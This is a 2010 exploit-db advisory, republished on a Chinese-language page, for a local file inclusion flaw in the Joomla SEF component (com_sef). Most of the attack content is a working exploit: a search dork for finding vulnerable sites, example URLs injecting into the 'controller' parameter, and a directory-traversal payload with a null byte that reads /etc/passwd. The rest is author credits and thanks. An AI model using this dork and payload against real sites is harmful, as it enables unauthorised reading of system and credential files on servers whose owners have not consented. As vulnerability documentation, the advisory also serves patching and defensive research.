Joomla! Component com_sef – Local File Inclusion

  • 作者: _mlk_
    日期: 2010-07-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14213/
  • # Exploit Title: Joomla Component SEF (com_sef) - LFI Vulnerability
# Date: 04, July 2010

# Author:_mlk_
# Software Link: http://bugsec.googlecode.com/files/Joomla_com_sef.zip
# Version: 0

# Tested on: all OS

# CVE : 0

# Code : here

Joomla Component SEF (com_sef) - Local File Inclusion Vulnerability

#########################################################################################


 [+] Discovered by : _mlk_ (Renan)

 [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs

 [+] Homepages :http://code.google.com/p/bugsec/
http://botecounix.com.br/blog/
http://c0d3rs.wordpress.com/

 [+] Location : Porto Alegre - RS, Brasil
 (or Brazil)

#########################################################################################


[-] Information

 [?] Script : SEF (Search Engine Friendly)

 [?] Home Script : http://www.joomla.com/

 [?] Dork/String :"index.php?option=com_sef" / "com_sef"

 [?] Date :04, July 2010


-----------------------------------------------------------------------------------------


[*] Parameters vuls :

 view
 controller


-----------------------------------------------------------------------------------------


[*] Example :

 http://localhost/index.php?option=com_sef&controller=[LFI]%00
 http://localhost/[PATH]/index.php?option=com_sef&controller=[LFI]%00


-----------------------------------------------------------------------------------------


[*] Demo :

 http://<server>/index.php?option=com_sef&controller=
 ../../../../../../../../../../../../../../../etc/passwd%00


#########################################################################################


[~] Agradecimentos :

Deus , Familiares , Amigos e Tricolor Gaúcho (Grémio) .
Em especial "m0nad" ( capitao caverna \o/ ) .


#########################################################################################